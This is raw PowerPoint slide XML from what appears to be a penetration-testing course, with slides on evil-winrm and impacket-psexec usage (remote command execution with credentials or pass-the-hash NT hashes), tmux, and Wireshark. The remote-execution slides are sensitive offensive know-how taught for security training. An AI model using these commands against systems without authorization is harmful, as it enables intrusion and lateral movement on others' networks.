          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="2819400"/>
            <a:ext cx="6963747" cy="2962688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31083923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33F6B-E0D5-409D-A4AB-227E42828370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>242</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A33E53A-9976-472D-8607-A3BF64D072E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>evil-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>winrm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43CCCCB0-EF80-4A26-A179-1E1BF1EEA046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires port 5985/TCP on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command execution with credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>evil-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>winrm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-i [IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-P [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-u [USER]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p [PASS]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-h [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="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BFD612CA-4448-4DA0-BBA7-323988F42149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020408" y="2667000"/>
            <a:ext cx="6390249" cy="2948035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24910069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A6527A-6BD2-4B65-9AEA-B23A4A79EB07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>243</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02240E1-2027-4F1E-A602-4B91608BD8CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE3D4283-0F63-4432-934A-8B6459399A85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires port 445/TCP on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command execution with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>impacket-psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user:password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-hashes :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EE1F9F-47E4-4453-8548-105025367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099" y="2971800"/>
            <a:ext cx="7184371" cy="260814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94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9F490-8FCF-4417-AFC4-5F8DF8EFA2D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>244</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C1624A-319F-4968-B644-38B2319A7CAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E82465-F194-46E7-B45F-E9CF74B070E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="5593080" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminal multiplexer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have multiple windows in one terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default PRE = CTRL+B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jobs continue to run after connection is terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging capability great for reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally get expanded history even after clearing the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55E1899-A4B9-439B-8D4F-557842252326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1600200"/>
            <a:ext cx="5973009" cy="3372321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38015998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3016E-0ED6-441E-AA4E-3751C2BAB8AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>245</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA3F0A10-1A3C-49F8-9EE0-1936CFD49754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C933A4-D12B-40A5-8173-DDD9A7A9944E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2249239" y="1173338"/>
            <a:ext cx="7840859" cy="4892323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5445656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389950-21C5-4304-B74E-09D2C86193A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>246</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63993D13-2042-400B-A5D9-7A0898D23F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – GUI-based Traffic Analyzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F354EC-7DB2-4EDA-B391-615D9E6F5754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="1171669"/>
            <a:ext cx="6888765" cy="4905723"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Right Arrow 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23AE4EB8-9795-4BC4-AD7B-57F4FA466DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189892" y="1620630"/>
            <a:ext cx="1534508" cy="126609"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D12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CA0EB6-B5E9-4BC8-9054-38E949FBA9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180797" y="1431324"/>
            <a:ext cx="2983651" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Display Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Arrow 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{837B0436-9D78-4682-BF11-7B84B224D493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189892" y="5212581"/>
            <a:ext cx="1534508" cy="126609"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D12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98B95B-05AD-4FCD-8C8B-63FD3361CC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180795" y="4860386"/>
            <a:ext cx="2983651" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Packet Content in Hex and ASCII</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Right Arrow 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5CB80CE-2024-4882-889F-E2C053FA26E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189892" y="2901627"/>
            <a:ext cx="1534508" cy="126609"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D12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B95FCD-A1DD-494F-A9A0-BEA521228AD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228642" y="2579042"/>
            <a:ext cx="2983651" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Packet Headers in OSI order</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18D22057-9F03-4E5F-A689-1742C203C51B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189892" y="2086771"/>
            <a:ext cx="1534508" cy="126609"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D12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2B5C4C-2A5D-441C-81F5-A679A314DA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180796" y="1920189"/>
            <a:ext cx="2983651" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Packets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE399E73-DFD9-40F9-B50B-4DD740161CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189892" y="3649434"/>
            <a:ext cx="1534508" cy="126609"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D12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22157D9-4D86-4E59-AC16-BA096731CB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228642" y="3456840"/>
            <a:ext cx="2983651" cy="461665"/>
